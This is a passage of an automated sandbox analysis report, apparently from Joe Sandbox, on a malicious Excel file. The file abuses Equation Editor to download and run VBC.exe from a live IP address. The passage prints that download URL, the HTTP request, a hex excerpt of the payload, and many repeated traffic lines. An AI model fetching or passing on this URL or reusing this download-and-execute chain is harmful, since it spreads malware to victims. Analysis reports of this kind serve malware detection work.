    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: global trafficTCP traffic: 172.245.34.91:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 172.245.34.91:80
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Nov 2022 07:13:05 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33Last-Modified: Tue, 29 Nov 2022 05:24:03 GMTETag: "74a68-5ee95323a363c"Accept-Ranges: bytesContent-Length: 477800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 e8 81 e9 50 86 d2 e9 50 86 d2 e9 50 86 d2 2a 5f d9 d2 eb 50 86 d2 e9 50 87 d2 4f 50 86 d2 2a 5f db d2 e6 50 86 d2 bd 73 b6 d2 e3 50 86 d2 2e 56 80 d2 e8 50 86 d2 52 69 63 68 e9 50 86 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 2a 02 00 00 08 00 00 4a 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 04 00 00 17 86 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 e0 06 00 68 88 02 00 00 00 00 00 00 00 00 00 10 35 07 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 61 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 03 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 30 04 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 88 02 00 00 e0 06 00 00 8a 02 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035406CF
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.34.91
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comS equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973436340.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exe
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exej
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.34.91/5643/VBC.exel
    Source: vbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://s.symcd.com06
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-ts
    Source: vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
    Source: EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035406CF
    Source: global trafficHTTP traffic detected: GET /5643/VBC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.34.91Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004054B0

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: document is protected 18 19 20 21 22 23 Open the document in If thiS document was n :' h~
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
